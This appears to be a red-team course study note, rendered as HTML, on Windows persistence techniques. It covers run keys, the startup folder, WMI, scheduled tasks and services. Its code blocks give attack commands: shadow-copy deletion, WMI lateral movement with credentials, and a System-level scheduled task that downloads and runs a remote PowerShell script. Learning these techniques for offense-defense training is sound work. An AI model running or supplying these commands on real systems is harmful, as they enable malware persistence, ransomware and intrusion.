<!DOCTYPE html>
<html>
<head>
<title>persistence</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
/* GitHub stylesheet for MarkdownPad (http://markdownpad.com) */
/* Author: Nicolas Hery - http://nicolashery.com */
/* Version: b13fe65ca28d2e568c6ed5d7f06581183df8f2ff */
/* Source: https://github.com/nicolahery/markdownpad-github */

/* RESET
=============================================================================*/

html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td, article, aside, canvas, details, embed, figure, figcaption, footer, header, hgroup, menu, nav, output, ruby, section, summary, time, mark, audio, video {
  margin: 0;
  padding: 0;
  border: 0;
}

/* BODY
=============================================================================*/

body {
  font-family: "Open Sans", "JetBrains Mono", sans-serif;
  font-size: 14px;
  line-height: 1.6;
  color: #333;
  background-color: #fff;
  padding: 20px;
  max-width: 960px;
  margin: 0 auto;
}

body>*:first-child {
  margin-top: 0 !important;
}

body>*:last-child {
  margin-bottom: 0 !important;
}

/* BLOCKS
=============================================================================*/

p, blockquote, ul, ol, dl, table, pre {
  margin: 15px 0;
}

/* HEADERS
=============================================================================*/

h1, h2, h3, h4, h5, h6 {
  margin: 20px 0 10px;
  padding: 0;
  font-weight: bold;
  -webkit-font-smoothing: antialiased;
}

h1 tt, h1 code, h2 tt, h2 code, h3 tt, h3 code, h4 tt, h4 code, h5 tt, h5 code, h6 tt, h6 code {
  font-size: inherit;
}

h1 {
  font-size: 28px;
  color: #000;
}

h2 {
  font-size: 24px;
  border-bottom: 1px solid #ccc;
  color: #000;
}

h3 {
  font-size: 18px;
}

h4 {
  font-size: 16px;
}

h5 {
  font-size: 14px;
}

h6 {
  color: #777;
  font-size: 14px;
}

body>h2:first-child, body>h1:first-child, body>h1:first-child+h2, body>h3:first-child, body>h4:first-child, body>h5:first-child, body>h6:first-child {
  margin-top: 0;
  padding-top: 0;
}

a:first-child h1, a:first-child h2, a:first-child h3, a:first-child h4, a:first-child h5, a:first-child h6 {
  margin-top: 0;
  padding-top: 0;
}

h1+p, h2+p, h3+p, h4+p, h5+p, h6+p {
  margin-top: 10px;
}

/* LINKS
=============================================================================*/

a {
  color: #4183C4;
  text-decoration: none;
}

a:hover {
  text-decoration: underline;
}

/* LISTS
=============================================================================*/

ul, ol {
  padding-left: 30px;
}

ul li > :first-child, 
ol li > :first-child, 
ul li ul:first-of-type, 
ol li ol:first-of-type, 
ul li ol:first-of-type, 
ol li ul:first-of-type {
  margin-top: 0px;
}

ul ul, ul ol, ol ol, ol ul {
  margin-bottom: 0;
}

dl {
  padding: 0;
}

dl dt {
  font-size: 14px;
  font-weight: bold;
  font-style: italic;
  padding: 0;
  margin: 15px 0 5px;
}

dl dt:first-child {
  padding: 0;
}

dl dt>:first-child {
  margin-top: 0px;
}

dl dt>:last-child {
  margin-bottom: 0px;
}

dl dd {
  margin: 0 0 15px;
  padding: 0 15px;
}

dl dd>:first-child {
  margin-top: 0px;
}

dl dd>:last-child {
  margin-bottom: 0px;
}

/* CODE
=============================================================================*/

pre, code, tt {
  font-size: 12px;
  font-family: Consolas, "Liberation Mono", Courier, monospace;
}

code, tt {
  margin: 0 0px;
  padding: 0px 0px;
  white-space: nowrap;
  border: 1px solid #eaeaea;
  background-color: #f8f8f8;
  border-radius: 3px;
}

pre>code {
  margin: 0;
  padding: 0;
  white-space: pre;
  border: none;
  background: transparent;
}

pre {
  background-color: #f8f8f8;
  border: 1px solid #ccc;
  font-size: 13px;
  line-height: 19px;
  overflow: auto;
  padding: 6px 10px;
  border-radius: 3px;
}

pre code, pre tt {
  background-color: transparent;
  border: none;
}

kbd {
    -moz-border-bottom-colors: none;
    -moz-border-left-colors: none;
    -moz-border-right-colors: none;
    -moz-border-top-colors: none;
    background-color: #DDDDDD;
    background-image: linear-gradient(#F1F1F1, #DDDDDD);
    background-repeat: repeat-x;
    border-color: #DDDDDD #CCCCCC #CCCCCC #DDDDDD;
    border-image: none;
    border-radius: 2px 2px 2px 2px;
    border-style: solid;
    border-width: 1px;
    font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;
    line-height: 10px;
    padding: 1px 4px;
}

/* QUOTES
=============================================================================*/

blockquote {
  border-left: 4px solid #DDD;
  padding: 0 15px;
  color: #777;
}

blockquote>:first-child {
  margin-top: 0px;
}

blockquote>:last-child {
  margin-bottom: 0px;
}

/* HORIZONTAL RULES
=============================================================================*/

hr {
  clear: both;
  margin: 15px 0;
  height: 0px;
  overflow: hidden;
  border: none;
  background: transparent;
  border-bottom: 4px solid #ddd;
  padding: 0;
}

/* TABLES
=============================================================================*/

table th {
  font-weight: bold;
}

table th, table td {
  border: 1px solid #ccc;
  padding: 6px 13px;
}

table tr {
  border-top: 1px solid #ccc;
  background-color: #fff;
}

table tr:nth-child(2n) {
  background-color: #f8f8f8;
}

/* IMAGES
=============================================================================*/

img {
  max-width: 100%
}
</style>
</head>
<body>
<h1><a href="https://www.udemy.com/course/red-team-operations-initial-access-to-ransomware-deployment/learn/lecture/39335384?start=0#overview">Persistence</a> - section 6</h1>
<h2><a name="reg_keys">Registry keys</a></h2>
<p>Run Keys:</p>
<blockquote>
<p>HKCU\Software\Microsoft\Windows\CurrentVersion\Run</p>
<p>HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce</p>
<p>HKLM\Software\Microsoft\Windows\CurrentVersion\Run</p>
<p>HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce</p>
</blockquote>
<p>Examples:</p>
<pre><code>reg.exe add &quot;HKLM\Software\Microsoft\Windows\CurrentVersion\Run&quot; /v Notepad /t REG_SZ /d &quot;C:\Windows\System32\notepad.exe&quot;
</code></pre>

<p>Startup keys:</p>
<blockquote>
<p>HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</p>
<p>HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</p>
<p>HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</p>
<p>HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</p>
</blockquote>
<p>Examples:
    cp malware.exe &quot;C:\Users\%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\&quot;</p>
<p>Service Keys:</p>
<blockquote>
<p>HKLM\SYSTEM\CurrentControlSet\Services</p>
</blockquote>
<p>Examples:</p>
<h2><a name="startup">Startup folder</a></h2>
<p>Startup folder:</p>
<blockquote>
<p>C:\Users\%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\</p>
</blockquote>
<p>Examples:</p>
<pre><code>cp malware.exe &quot;C:\Users\%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\&quot;
</code></pre>

<h2><a name="wmi">Windows Management Instrumentation (WMI)</a></h2>
<p>Examples:</p>
<p>Reconnaissance</p>
<pre><code>wmic useraccount list full
wmic group list full
</code></pre>

<p>Impact</p>
<pre><code>wmic shadowcopy delete /noninteractive
wmic process call create vssadmin.exe delete shadows /all /quiet 
wmic process call create malware.exe
</code></pre>

<p>Lateral movement</p>
<pre><code>wmic /node:192.168.4.31 /user:dgolding /password:Password123 process call create &quot;C:\malware.exe&quot;
</code></pre>

<p>Review video 23 for filter + consumer = binding</p>
<h2><a name="sched">Scheduled tasks</a></h2>
<p>Examples:</p>
<pre><code>schtasks /create /sc onlogon /tn &quot;malware&quot; /tr &quot;C:\malware.exe&quot;
schtasks /create /sc minute /mo 1 /tn &quot;malware&quot; /tr &quot;C:\malware.exe&quot;
schtasks /create /tn &quot;malware&quot; /tr &quot;C:\Windows\syswow64\WindowsPowershell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep Bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.4.31/malware.ps1'''))'&quot; /sc onlogon /ru System
schtasks /query /fo list /v
schtasks /delete /tn &quot;malware&quot; /f
schtasks /run /tn &quot;malware&quot;
</code></pre>

<h2><a name="serv">Services</a></h2>
<p>Examples:</p>
<pre><code>sc query windefend
sc create malware binpath=&quot;C:\malware.exe&quot; start=auto
sc start malware
sc start malware
sc delete malware
sc create malware binpath=&quot;powershell.exe PABzAGMAcgBpAHAAdAAgAGwAYQBuAGcAdQBhAGcAZQA9ACIAVgBCA==&quot; start=auto
</code></pre>


</body>
</html>
<!-- This document was created with MarkdownPad, the Markdown editor for Windows (http://markdownpad.com) -->
